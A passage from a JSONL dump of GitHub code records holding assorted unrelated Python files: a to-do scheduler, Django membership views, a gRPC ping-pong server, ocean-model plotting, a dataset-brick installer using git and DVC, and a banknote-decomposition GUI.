matches):\n qms = [{'id': qid, 'query': q, 'matches': ms}\n for qid, q, ms in zip(query_ids, queries, matches)]\n\n with open(json_path, 'w') as f:\n json.dump(qms, f)\n\n\ndef write_spreadsheet(wb_path, queries, query_ids, matches):\n wb = Workbook()\n ws = wb.active\n\n for qid, query, matches in zip(query_ids, queries, matches):\n ws.title = qid\n ws.append(['# query: {}'.format(query)])\n\n header = ['score', 'sentence', 'url', 'checksum', 'date']\n ws.append(header)\n for m in matches:\n ws.append(m[k] for k 
in header)\n\n ws = wb.create_sheet()\n\n wb.save(wb_path)\n\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument('corpus_dir')\n ap.add_argument('query_dir')\n ap.add_argument('output_dir')\n ap.add_argument('-n', dest='n_best', type=int, default=500)\n args = ap.parse_args()\n\n logging.info('Starting...')\n\n if not os.path.exists(args.output_dir):\n os.mkdir(args.output_dir)\n\n logging.info('Loading queries...')\n query_strs, query_vecs, query_ids = load_queries(args.query_dir)\n\n logging.info('Finding matches...')\n matches = search(query_vecs, args.corpus_dir, args.output_dir, args.n_best)\n\n # write this two ways -- once for my convenience, once for others'\n logging.info('Writing output...')\n\n json_path = os.path.join(args.output_dir, 'matches.json')\n write_json(json_path, query_strs, query_ids, matches)\n\n wb_path = os.path.join(args.output_dir, 'matches.xlsx')\n write_spreadsheet(wb_path, query_strs, query_ids, matches)\n\n logging.info('Done!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skdreier/religion-politics","sub_path":"similarity/find_matches.py","file_name":"find_matches.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72996576553","text":"import json\nimport datetime\nimport importlib\nfrom calendargaps import *\n\n#Importance Parameters\na = 0.5\nb = 0.3\nc = 0.2\n\n#Input Variables\nprio = 0\nworkhours = 0\ndiff = 0\n\n#Other Setup\ntasklist = []\nworkingTaskList = []\nweek = []\nexittasks = 'n'\noverflow = False\neachDayTotal = 0\nweeklyOverage = 0\n\n#Error Handling\ndef inputRatingInRange(message,low,high):\n while True:\n try:\n x = int(input(message))\n if x < low or x > high:\n raise TypeError\n break\n except (TypeError, ValueError):\n print(\"\\nInvalid input. Please try again.\")\n print(\"----------------\")\n return x\n\n#Adding a New Task\ndef newTask():\n name = input(\"\\nTask Name: \")\n newPrio = inputRatingInRange(\"Priority (1-5): \",1,5)\n newDiff = inputRatingInRange(\"Difficulty (1-5): \",1,5)\n newworkhours = inputRatingInRange(\"Duration (1-5 hours): \",1,5)\n addedTask = Task(name, newPrio, newworkhours, newDiff)\n tasklist.append(addedTask)\n\n#JSON THINGS\ndef tasksToDict():\n listofdics = [item.__dict__ for item in tasklist]\n for dic in listofdics:\n dic['day'] = dic['day'].__dict__\n dic['day']['date'] = str(dic['day']['date'])\n dic['day']['worklist'] = [str(i) for i in dic['day']['worklist']]\n return listofdics\ndef tasksToJSON():\n with open('listoftasks.json', mode='w') as file:\n json.dump(tasksToDict(), file, indent=4)\n\n# Class Setup\nclass Task:\n def __init__(self, name, prio, workhours, diff):\n self.name = name\n self.prio = int(prio)\n self.workhours = datetime.timedelta(hours=workhours).seconds / 3600\n self.diff = int(diff)\n self.day = theday\n #This is the equation determining the importance based on the input parameters. 
Subject to change.\n self.importanceIndex = ((a*prio) + ((workhours-2)**2 + 1)*b + ((4/9*(diff-4)**2) + 1)*c)*20\n self.isAssigned = False\n self.overage = 0\n\n def printsummary(self):\n print(\" ----------------\",\"\\n\",\n self.name,\"\\n\",\n \"Priority:\", self.prio,\"\\n\",\n \"Difficulty:\", self.diff,\"\\n\",\n \"Duration:\", self.workhours,\"\\n\",\n \"Importance:\",round(self.importanceIndex,1),\"%\",\"\\n\",\n \"Will be done on:\", self.day.dayname)\n if self.overage > 0:\n print(\" *\"+str(self.overage), \"hours over*\\n\")\n\nclass Day:\n #Need to implement actual datetime stuff in here lol\n def __init__(self, date, worklist):\n self.date = date\n self.worklist = worklist\n self.workhours = sumOfDeltas(worklist).seconds / 3600\n self.dayname = date.strftime('%A')\n\n#--MAIN FLOW OF THE PROGRAM--#\n\n#Parse JSON from dict into task class\nwith open('listoftasks.json', mode='r') as file:\n JSONtasks = json.load(file)\n if not JSONtasks:\n tasklist = []\ntasklist = [Task(i['name'], i['prio'], i['workhours'], i['diff']) for i in JSONtasks]\n\n#Create new tasks\ncreateNewTasks = input('Create new tasks? (y/n): ')\nif createNewTasks == 'y':\n while exittasks == 'n':\n newTask()\n exittasks = input(\"Exit task entry stage? (y/n): \")\n\n#Create new days\n#NEED TO FIX SUPPORT FOR CROSS-MONTH RANGES!!\nif week == []:\n for i in range(2):\n week.append(Day(theday+datetime.timedelta(days=i+1), findGaps(theday+datetime.timedelta(days=i+1))))\n\n#Sort entries by Importance and slot them into available work-hours\ntasklist.sort(key=lambda x: x.importanceIndex, reverse=True)\ntotalWorkHours = sum([i.workhours for i in week])\nif sum([i.workhours for i in tasklist]) > sum([i.workhours for i in week]):\n print(\"Shit too damn big bruh\\n\")\n overflow = True #deal with this later\nelse:\n #Start fitting tasks in days:\n for eachDay in week:\n workingTaskList = [i for i in tasklist if not(i.isAssigned)]\n if workingTaskList == []:\n break\n eachDayTotal += eachDay.workhours\n for item in workingTaskList:\n item.day = eachDay\n eachDayTotal -= item.workhours\n item.isAssigned = True\n if eachDayTotal <= 0:\n if eachDayTotal < 0:\n item.overage -= eachDayTotal\n break\n #Print all entries\n for i in tasklist:\n i.printsummary()\n tasksToJSON()\n","repo_name":"JulsAwad/todolist","sub_path":"smarttodo.py","file_name":"smarttodo.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31250670806","text":"import json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nconfig_file_name = \"/Users/jingyiwu/Documents/Project/MARL/configs/config.json\"\nwith open(config_file_name, 'r') as f:\n config = json.load(f)\n\ndecay_factor = 0.999\napp_type_id = 2\napp_type_sub_id = 1\npolicy_id = 0\nnum_servers = config[\"num_servers\"]\nfolder_name = config[\"folder_name\"]\nnum_servers = config[\"num_servers\"]\napp_type = config[\"app_types\"][app_type_id]\napp_sub_type = config[\"app_sub_types\"][app_type][app_type_sub_id]\npolicy_type = config[\"policy_types\"][policy_id]\npath = f\"{folder_name}/{num_servers}_server/{policy_type}/{app_type}_{app_sub_type}\"\ndata_server_0 = []\ndata_server_1 = []\ndata_server_2 = []\n\nfor server_id in [2, 56, 75]:\n itr = 1\n avg_length = 0\n y = [] # Initialize the y-axis\n file_path = os.path.join(path, f\"server_{server_id}_app_states.txt\")\n with open(file_path, 'r') as file:\n lines = file.readlines()\n for line in lines:\n 
avg_length = decay_factor * avg_length + (1 - decay_factor) * float(line.strip())\n if (itr) % 10 == 0:\n y.append(avg_length / (1 - decay_factor ** itr))\n itr += 1\n if server_id == 2:\n data_server_0 = y\n elif server_id == 56:\n data_server_1 = y\n elif server_id == 75:\n data_server_2 = y\n\nwith open(os.path.join(\"/Users/jingyiwu/Documents/Project/MARL_PAPER/asplos24/data\", f\"q{app_type_sub_id+1}_length_change.txt\"), \"w\") as file:\n for i in range(len(data_server_0)): # Assuming all lists have the same length\n file.write(f\"{data_server_0[i]}\\t{data_server_1[i]}\\t{data_server_2[i]}\\n\")\n","repo_name":"Huangmao1208/MARL","sub_path":"src/plot_comparison.py","file_name":"plot_comparison.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35900026456","text":"\"\"\"Memberships Views.\"\"\"\n\nfrom rest_framework import mixins, status, viewsets, pagination\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response \nfrom rest_framework.views import APIView\n\nfrom rest_framework.permissions import (\n IsAuthenticated\n)\nfrom crm.memberships.serializers import (AddPaymentSerializer,\n CreateSerializer,\n ListRetrieveMembershipModelSerializer,\n UpdateSerializer)\nfrom crm.memberships.models import Membership, Payment, BankAccount\nfrom django_filters import rest_framework as filters\n\n\nclass MembershipViewSet(viewsets.GenericViewSet,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin, \n mixins.UpdateModelMixin, \n mixins.ListModelMixin): \n\n class CustomPagination(pagination.PageNumberPagination):\n page_size = 1000\n permission_classes = [IsAuthenticated]\n pagination_class = CustomPagination \n queryset = Membership.objects.all().order_by('date_initial') \n filter_backends = (filters.DjangoFilterBackend,)\n \n\n class MembershipFilter(filters.FilterSet):\n class Meta:\n model = Membership\n\n fields = {\n # create filters by RUT (tax ID)\n 'client_business__dni_business': ['contains'], \n 'client_person__dni': ['contains'], \n 'valoration': ['exact'], \n 'date_initial': ['contains', 'gte', 'lte', 'year', \n 'month', 'day', 'year__range', 'month__range',\n 'day__range', 'date__range', 'hour', 'minute', 'second', \n 'hour__range', 'minute__range', 'minute__range'], \n 'date_finish': ['contains', 'gte', 'lte', 'year', 'month', 'day', \n 'year__range', 'month__range','day__range', 'date__range', \n 'hour', 'minute', 'second', 'hour__range', 'minute__range', \n 'minute__range'], \n 'is_active': ['exact'], \n 'paid_out': ['exact'], \n 'is_finish': ['exact'],\n 'is_finish_date': ['exact'],\n 'is_cancel': ['exact'],\n 'is_renovation': ['exact']\n }\n \n filterset_class = MembershipFilter\n lookup_field = 'uuid'\n\n def get_serializer_class(self):\n if self.action == 'add_payment':\n return AddPaymentSerializer\n if self.action == 'create':\n return CreateSerializer\n if self.action == 'partial_update':\n return UpdateSerializer\n if self.action in ('list', 'retrieve'):\n return ListRetrieveMembershipModelSerializer\n\n @action(detail=True, methods=['post'])\n def add_payment(self, request, *args, **kwargs):\n membership = self.get_object()\n instance_bank = BankAccount.objects.filter(id=request.data['bank']).first()\n\n Payment.objects.create(bank_account=instance_bank, \n membership=membership, \n amount=request.data['amount'], \n method=request.data['method'],\n is_ticket=request.data['is_ticket'],\n is_invoice=request.data['is_invoice'])\n return Response('ok', 
status=status.HTTP_201_CREATED)\n\n","repo_name":"felipebarraza6/cowork-chillan-dev-stack","sub_path":"crm/memberships/views/memberships.py","file_name":"memberships.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41605284934","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport hyperclip\nfrom matplotlib import pyplot as plt\n\nn = 2\nm = 3\n\nnp.random.seed(29)\nhyperplanes = [hyperclip.Hyperplane().set_by_points(np.random.random((n,n))) for i_m in range(m)]\nnp.random.seed(None)\n\nX = np.random.random((10**6,n))\n\nid_pos_side = np.ones(X.shape[0])\nfor hyp in hyperplanes:\n id_pos_side = np.all((id_pos_side, hyp.side(X)), axis=0)\n\n# fig, axs = plt.subplots()\n# axs.set_aspect('equal', 'box')\n# plt.scatter(X[id_pos_side, 0], X[id_pos_side, 1], s=2, color='gray')\n\nfor hyp in hyperplanes:\n sol = hyp.compute_n_solutions()\n x_a, y_a, x_b, y_b = sol.flat\n \n a = (y_b-y_a)/(x_b-x_a)\n b = y_a - x_a * a\n \n y_0 = b\n y_1 = a * 1 + b\n \n # plt.plot([0, 1], [y_0, y_1])\n# plt.xlim([0,1])\n# plt.ylim([0,1])\n\nhc = hyperclip.Hyperclip().set_hyperplanes(hyperplanes)\n\n\nA = np.array([[-1., 1, 0],\n [ 0, 0, 1],\n [-1, -2, -1]]).T\nR = np.array([0.5, \n -0.5, \n 3])\n\nA = np.array([[0.25585178874659287],\n [0.022416578071991308]])\nR = np.array([2.5814930867384747])\n\nhc = hyperclip.Hyperclip(cython=True, verbose=1).set_A_R(A, R)\n\nfrom time import time\nst = time()\nvol = hc.volume()\net = time()\nprint('vol', vol, 'time', et-st)\n\n# st = time()\n# cond_A = hc._clipping_condition_A()\n# et = time()\n# print('A python', cond_A, et-st)\n\n# print('B cond', hyperclip.hyperfunc.clipping_condition_B_numpy(A, R))\n\n# st = time()\n# vol = hyperclip.hyperfunc.volume_numpy(A, R, check_A=True)\n# et = time()\n# print('vol cython', vol, et-st)\n\n# st = time()\n# vol = hc.volume()\n# et = time()\n# print('vol python', vol, et-st)\n\n# A = np.array([[-1],\n # [4.6*10**-310]])\n\n# hc.check()\n# vol = hc.volume()\n# print('10**6 MonteCarlo : ', id_pos_side.mean(), 'Hyperclip :', vol)\n\n# plt.text(0.25,0.2, \"10**6 MonteCarlo : \"+str(round(id_pos_side.mean(),4)))\n# plt.text(0.25,0.1, \"Hyperclip : \"+str(round(vol,4)))\n# plt.show()\n\n# A = np.array([[10,12.5,2.1],\n# [4,5.5,3.2],\n# [5.1,6.3,-5.4]])\n# # A = np.array([[1, 0, 2, -1],\n# # [3, 0, 0, 5],\n# # [2, 1, 4, -3],\n# # [1, 0, 5, 0]]).astype(np.double)\n# print(np.linalg.det(A))\n\n# hyperclip.hyperfunc.determinant_numpy(A)","repo_name":"fmazy/hyperclip","sub_path":"tests/test_2d_plot.py","file_name":"test_2d_plot.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70155797993","text":"import grpc\nimport pp_pb2, pp_pb2_grpc\nfrom concurrent import futures\nimport time\n\n\nclass Listener(pp_pb2_grpc.PPServiceServicer):\n\n def __init__(self):\n pass\n\n def ping(self, request, context):\n print(\"Received Ping, Sending Pong\")\n return pp_pb2.Pong(message=\"Pong\")\n\ndef serve():\n \"\"\"Main server function. 
Opens socket and listens for incoming grpc packets\"\"\"\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))\n pp_pb2_grpc.add_PPServiceServicer_to_server(Listener(), server)\n server.add_insecure_port(\"[::]:80\")\n server.start()\n try:\n while True:\n print(\"Running...\")\n time.sleep(10)\n except KeyboardInterrupt:\n print(\"Encountered KeyboardInterrupt, terminating.\")\n server.stop(0)\n\nif __name__ == \"__main__\":\n serve()\n","repo_name":"eldrad294/GRPC-Ping-Pong","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6718952006","text":"import cv2 as cv\nimport numpy as np\nfrom pathlib import Path\n\nfourcc = cv.VideoWriter_fourcc(*'DIVX')\nOut = cv.VideoWriter('UpscaledFile-DIVX.avi', fourcc, 24.0, (1020,1020),True)\nFrameLoc = Path(\"frames/VideoFrames-Upscaled\")\nFramNum = 1\nLastFrame = 240\nfor FramNum in range(1,LastFrame+1):\n\tFilePath = FrameLoc/(str(FramNum)+\".png\")\n\tOut.write(cv.imread(str(FilePath)))\nOut.release()\nprint(\"All Done!!\")","repo_name":"jawad-kp/FYP-SuperResolution","sub_path":"VideoMaker.py","file_name":"VideoMaker.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22633037735","text":"import subprocess, functools, os, re, datetime, json\nfrom subprocess import run, DEVNULL\nimport types, pyarrow.parquet as pq, re\nfrom pathlib import Path\nfrom .config import bblib, token\nfrom logger import logger\nimport os, urllib.request as request, functools, dvc.api\nfrom urllib.parse import urlparse\n\nfrom .checks import check_url_available, check_token, check_symlink_permission\n\nclass Brick:\n\n def __init__(self, remote, commit):\n self.remote = remote\n self.commit = commit\n \n @staticmethod\n def FromURL(url):\n \"\"\"Get the version of a brick from its git repo.\"\"\"\n remote, commit = url.split(\"#\")\n return Brick(remote, commit)\n\n @staticmethod\n def FromPath(path):\n \"\"\"Get the version of a brick from its git repo.\"\"\"\n bdir = bblib(path)\n gsys = functools.partial(subprocess.check_output, shell=True, cwd=bdir)\n commit = gsys(\"git rev-parse HEAD\").decode().strip()\n remote = gsys(\"git config --get remote.origin.url\").decode().strip()\n return Brick(remote, commit)\n\n @staticmethod\n def FromRemote(remote):\n \"\"\"Get the version of a brick from its git repo.\"\"\"\n try:\n logger.info(f\"getting latest version of {remote}\")\n commit = subprocess.check_output(f'git ls-remote \"{remote}\" HEAD', shell=True)\n commit = commit.decode().strip().split()[0]\n return Brick(remote, commit)\n except subprocess.CalledProcessError as e:\n logger.error(f\"failed to get latest version of {remote}: {e}\")\n logger.error(f\"is {remote} a valid git repository?\")\n return None\n\n @staticmethod\n def Resolve(ref, force_remote=False):\n \"\"\"find all bricks matching ref. `ref` can be:\n - existing name ie. 'tox21'\n - git-url syntax ie. 
'https://github.com/biobricks-ai/tox21#commit'\n if `force_remote` is True then retrieve brick from remote repository\"\"\"\n # TODO this should resolve from the .bb directory when in a biobrick repo\n\n # if name matches remote#commit then resolve from url \n if re.match(\"^http.*[0-9a-f]{40}$\",ref):\n return Brick.FromURL(ref)\n \n # if name matches remote then resolve from remote\n if re.match(\"^http.*$\",ref):\n return Brick.FromRemote(ref)\n \n # otherwise resolve to https://github.com/biobricks-ai/\n remote = f\"https://github.com/biobricks-ai/{ref}\"\n\n if force_remote: \n return Brick.FromRemote(remote)\n\n # retrieve from library if it exists\n bricks = []\n bdir = bblib() / \"biobricks-ai\" / ref\n if bdir.exists():\n for bdir in (bblib() / \"biobricks-ai\" / ref).iterdir():\n logger.info(f\"checking {bdir.name} for {ref}\")\n # if the directory is a sha hash then add it to brick array\n if bdir.is_dir() and re.match(\"[0-9a-f]{40}$\",bdir.name):\n brick = Brick.FromPath(bdir)\n if remote == brick.remote:\n bricks.append(brick)\n \n # sort the bricks by their commit_date\n bricks.sort(key=lambda b: b.get_commit_date(), reverse=True)\n \n # pick the most recent one\n if len(bricks) > 0:\n return bricks[0]\n \n # if we can't find it in the library, then get the remote version\n return Brick.FromRemote(remote)\n\n\n def get_commit_date(self):\n \"\"\"get the date of the commit\"\"\"\n gsys = functools.partial(subprocess.check_output, shell=True, cwd=self.path())\n date = gsys(\"git show -s --format=%ci\").decode().strip()\n return datetime.datetime.strptime(date, \"%Y-%m-%d %H:%M:%S %z\")\n\n def url(self):\n return f\"{self.remote}#{self.commit}\"\n \n def urlpath(self):\n return Path(urlparse(self.url()).path[1:])\n\n def path(self):\n return bblib() / self.urlpath() / self.commit\n\n def _relpath(self):\n \"get the path to this brick relative to bblib\"\n return self.urlpath() / self.commit\n\n def install(self):\n \"install this brick\"\n logger.info(f\"running checks on brick\")\n check_url_available(self.remote)\n check_token(token())\n check_symlink_permission()\n\n if self.path().exists():\n logger.info(f\"\\033[91m{self.url()}\\033[0m already exists in BioBricks library.\")\n return True\n\n cmd = functools.partial(run,shell=True,stdout=DEVNULL,stderr=DEVNULL)\n \n # old way - cmd(f\"git submodule add {self.remote} {self.repo}\",cwd=bblib())\n logger.info(f\"git clone {self.remote} {self._relpath()} in {bblib()}\")\n cmd(f\"git clone {self.remote} {self._relpath()}\", cwd = bblib())\n cmd(f\"git checkout {self.commit}\", cwd = self.path())\n\n logger.info(f\"adding brick to dvc cache\")\n rsys = functools.partial(cmd,cwd=self.path())\n rsys(f\"dvc cache dir {bblib() / 'cache'}\")\n rsys(\"dvc config cache.shared group\")\n rsys(\"dvc config cache.type symlink\")\n\n # SET UP BIOBRICKS.AI DVC REMOTE WITH AUTH\n logger.info(f\"setting up credentials for dvc.biobricks.ai\")\n rsys(\"dvc remote add -f biobricks.ai https://dvc.biobricks.ai\")\n rsys(\"dvc remote modify --local biobricks.ai auth custom\")\n rsys(\"dvc remote modify --local biobricks.ai custom_auth_header BBToken\")\n rsys(\"dvc remote modify --local biobricks.ai read_timeout 300\")\n rsys(\"dvc remote modify --local biobricks.ai connect_timeout 300\")\n\n rsys(f\"dvc remote modify --local biobricks.ai password {token()}\")\n\n logger.info(f\"discovering brick assets dvc.biobricks.ai\")\n fs = dvc.api.DVCFileSystem(self.path())\n paths = fs.find(\"data\",maxdepth=1) + fs.find(\"brick\",maxdepth=1)\n 
parquet_paths = [x for x in paths if x.endswith('.parquet')]\n\n logger.info(f\"pulling brick assets\")\n run(f\"dvc pull {' '.join(parquet_paths)}\", cwd=self.path(), shell=True)\n \n logger.info(f\"\\033[94m{self.url()}\\033[0m succesfully downloaded to BioBricks library.\")\n return self\n \n def load(self):\n \"load this brick\"\n bdir = self.path()\n if not bdir.exists(): \n raise Exception(f\"no path '{bdir}' try `biobricks install {self.url()}`\")\n \n def dirns(dir: Path):\n filter = lambda d: d.name.endswith('.parquet')\n paths = [d for d in dir.rglob('*') if filter(d)]\n namespace = types.SimpleNamespace()\n pkey = lambda p: re.sub(r'[.-]','_',p)\n for p in paths:\n path = p.relative_to(dir)\n logger.info(f\"loading {path}...\")\n current = namespace\n for part in path.parts:\n key = pkey(part)\n if not hasattr(current, key) and part.endswith('.parquet'):\n setattr(current, key[:-8], pq.ParquetDataset(str(p)))\n elif not hasattr(current, key):\n setattr(current, key, types.SimpleNamespace())\n current = getattr(current, key)\n elif hasattr(current, key):\n current = getattr(current, key)\n logger.info(f\"loaded {len(paths)} tables from {dir}\")\n return namespace\n\n ns1 = dirns(bdir / 'data')\n ns2 = dirns(bdir / 'brick')\n result = {**ns2.__dict__, **ns1.__dict__}\n return types.SimpleNamespace(**result)\n \n def assets(self):\n \"get the assets for this brick\"\n bdir = self.path()\n if not bdir.exists(): \n raise Exception(f\"no path '{bdir}' try `biobricks install {self.url()}`\")\n \n def find_parquet_files(directory):\n if not directory.exists():\n return []\n for entry in os.scandir(directory):\n if entry.name.endswith('.parquet'):\n yield entry.path\n elif entry.is_dir():\n yield from find_parquet_files(entry.path)\n \n return list(find_parquet_files(bdir / 'data')) + list(find_parquet_files(bdir / 'brick'))\n \n def uninstall(self):\n \"uninstall this brick\"\n os.rmdir(self.path())\n ","repo_name":"AlxanderNeils/biobricks","sub_path":"biobricks/brick.py","file_name":"brick.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"41691886980","text":"import PySimpleGUI as sg\n\nlayout = [\n [sg.Text(\"Informe o valor em reais:\")],\n [sg.InputText(key=\"valor\")],\n [sg.Button(\"Decompor\"),sg.Button(\"Cancelar\")],\n [sg.Text(\"Aqui será mostrado as notas de 100\",key=\"n100\")],\n [sg.Text(\"Aqui será mostrado as notas de 50\",key=\"n50\")], \n [sg.Text(\"Aqui será mostrado as notas de 20\",key=\"n20\")],\n [sg.Text(\"Aqui será mostrado as notas de 10\",key=\"n10\")],\n [sg.Text(\"Aqui será mostrado as notas de 5\",key=\"n5\")],\n [sg.Text(\"Aqui será mostrado as notas de 2\",key=\"n2\")],\n [sg.Text(\"Aqui será mostrado as notas de 1\",key=\"n1\")],\n]\n\njanela = sg.Window(\"Decomposição de Notas\",layout)\n\nwhile True:\n evento, valores = janela.read()\n if evento == sg.WIN_CLOSED or evento == \"Cancelar\":\n print(\"A janela foi fechada\")\n break\n if evento == \"Decompor\":\n print(\"Cálculo Realizado\")\n valor = int(valores[\"valor\"])\n notas100 = valor // 100\n resto50 = valor % 100\n notas50 = resto50 // 50\n resto20 = resto50 % 50\n notas20 = resto20 // 20\n resto10 = resto20 % 20\n notas10 = resto10 // 10\n resto5 = resto10 % 10\n notas5 = resto5 // 5\n resto2 = resto5 % 5\n notas2 = resto2 // 2\n resto1 = resto2 % 2\n notas1 = resto1 // 1\n janela[\"n100\"].update(f\"Notas 100: {notas100}\")\n janela[\"n50\"].update(f\"Notas 50: {notas50}\")\n 
janela[\"n20\"].update(f\"Notas 20: {notas20}\")\n janela[\"n10\"].update(f\"Notas 10: {notas10}\")\n janela[\"n5\"].update(f\"Notas 5: {notas5}\")\n janela[\"n2\"].update(f\"Notas 2: {notas2}\")\n janela[\"n1\"].update(f\"Notas 1: {notas1}\")\n\njanela.close()","repo_name":"Migvalentini/PythonProgramacao","sub_path":"PY 06-23 GUI Ex3.py","file_name":"PY 06-23 GUI Ex3.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18907947253","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 31 16:59:01 2022\n\n@author: alsjur\n\"\"\"\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cartopy.crs as ccrs\nimport json\n\n\nimport sys\nsys.path.insert(0, '/home/alsjur/nird/energy-transfer/analysis')\nfrom LLC2A4 import readROMSfile, LLC2A4\n\nfigdir = '/home/alsjur/nird/figures_temp/'\n\nfontsize = 12\n\nA4grid = readROMSfile('/home/alsjur/PhD/Data/test_data/A4/'+'ocean_avg_1827.nc')\nLLCgrid = xr.open_dataset('/home/alsjur/PhD/Data/test_data/LLC2160/'+'LLC2160_grid.nc')\n\n# read transect defininitions from file\nwith open('/home/alsjur/nird/energy-transfer/data/LLCregions.txt') as f:\n data = f.read()\n LLCtransects = json.loads(data)\n\nA4transects = {}\n\nfor name, data in LLCtransects.items():\n LLCistart = data['idx_start']\n LLCistop = data['idx_stop']\n LLCjstart = data['idy_start']\n LLCjstop = data['idy_stop']\n \n A4istart, A4jstart = LLC2A4([LLCistart, LLCjstart], A4grid, LLCgrid)\n A4istop, A4jstop = LLC2A4([LLCistop, LLCjstop], A4grid, LLCgrid)\n \n A4transects[name] = {\n 'istart' : A4istart,\n 'istop' : A4istop,\n 'jstart' : A4jstart,\n 'jstop' : A4jstop,\n 'nr' : data['nr']\n }\n\n\nbath = A4grid.h\n\n\n# projection used for plotting\nprojection = ccrs.NearsidePerspective(central_longitude=-30\n , central_latitude=70.0\n #, satellite_height = 5E6\n )\n\nfig = plt.figure(constrained_layout=True, figsize=(15,10))\ngs = fig.add_gridspec(1,2)\n\naxd = {}\n\naxd['map'] = fig.add_subplot(gs[0], projection=projection)\naxd['idmap'] = fig.add_subplot(gs[1])\n\nvmin = 0\nvmax = bath.max()\n\n# plot map\ncm = axd['map'].contourf(bath.lon_rho, bath.lat_rho, bath.where(bath.lon_rho>0)\n ,transform=ccrs.PlateCarree()\n ,cmap='Blues'\n ,vmin=vmin\n ,vmax=vmax\n #,zorder=5\n )\naxd['map'].contourf(bath.lon_rho, bath.lat_rho, bath.where(bath.lon_rho<0)\n ,transform=ccrs.PlateCarree()\n ,cmap='Blues'\n ,vmin=vmin\n ,vmax=vmax\n #,zorder=1\n )\n\n# aestethics\n#ax.gridlines(color='gray', linestyle='--')\naxd['map'].coastlines()\n#axd['map'].gridlines()\naxd['map'].set_extent([-180, 180, 50, 90], crs=ccrs.PlateCarree())\n\n# remove spines\n#ax.outline_patch.set_visible(False)\naxd['map'].spines['geo'].set_visible(False)\n\n# plot index map\naxd['idmap'].pcolormesh(bath.i, bath.j, bath\n ,cmap='Blues'\n ,vmin=vmin\n ,vmax=vmax\n ,shading='auto'\n )\naxd['idmap'].set_aspect('equal')\n\ndef plot_region(bath, axd, istart, istop, jstart, jstop, nr):\n idxs = [istart, istop, istop, istart, istart]\n idys = [jstart, jstart, jstop, jstop, jstart]\n \n axd['idmap'].plot(idxs, idys\n , color='red'\n , lw=2\n )\n \n axd['idmap'].text((istart+istop)/2, (jstart+jstop)/2, f'{nr}'\n , color = 'red'\n , fontsize = fontsize\n , va = 'center'\n , ha = 'center'\n )\n \n\n lon0 = float(bath.lon_rho.isel(i=istart,j=jstart).values)\n lat0 = float(bath.lat_rho.isel(i=istart,j=jstart).values)\n \n lon1 = float(bath.lon_rho.isel(i=istop,j=jstart).values)\n lat1 = 
float(bath.lat_rho.isel(i=istop,j=jstart).values)\n \n lon2 = float(bath.lon_rho.isel(i=istop,j=jstop).values)\n lat2 = float(bath.lat_rho.isel(i=istop,j=jstop).values)\n \n lon3 = float(bath.lon_rho.isel(i=istart,j=jstop).values)\n lat3 = float(bath.lat_rho.isel(i=istart,j=jstop).values)\n \n #fix strange behavior when crossing from lon -180 to lon 180\n if lon0*lon2 < 0 and lon2 < -90:\n if lon0 < 0:\n lon0 += 360\n if lon1 < 0:\n lon1 += 360\n if lon2 < 0:\n lon2 += 360\n if lon3 < 0:\n lon3 += 360\n \n lons = [lon0, lon1, lon2, lon3, lon0]\n lats = [lat0, lat1, lat2, lat3, lat0]\n \n\n axd['map'].plot(lons, lats\n , color='red'\n , lw=2\n , transform=ccrs.PlateCarree()\n )\n \n axd['map'].text((lon0+lon1+lon2+lon3)/4, (lat0+lat1+lat2+lat3)/4, f'{nr}'\n , color = 'red'\n , fontsize = fontsize\n , transform=ccrs.PlateCarree()\n , va = 'center'\n , ha = 'center'\n )\n\nfor transect, info in A4transects.items():\n istart = info['istart']\n istop = info['istop']\n jstart = info['jstart']\n jstop = info['jstop']\n nr = info['nr']\n \n plot_region(bath, axd, istart, istop, jstart, jstop, nr) \n\nfig.savefig(figdir+'A4regions.png')\n\n","repo_name":"alpsjur/energy-transfer","sub_path":"ploting/A4_plot_regions_map.py","file_name":"A4_plot_regions_map.py","file_ext":"py","file_size_in_byte":4947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17532695695","text":"#!/usr/bin/env python\n\n\"\"\"\nArcade clock for Spectro.\n\"\"\"\n\n# Gets code to pass both pylint & pylint3:\n# pylint: disable=bad-option-value, useless-object-inheritance\n\nimport time\nfrom PIL import Image, ImageDraw\nfrom spectrobase import SpectroBase\n\nTWELVE_HOUR = True\nEURO_DATE = False\n\n# Each item in this list is a 4-tuple containing X, Y, width and height of\n# sprite data within the sprite sheet image. Some of the sprite elements\n# might overlap or get recycled (e.g. 
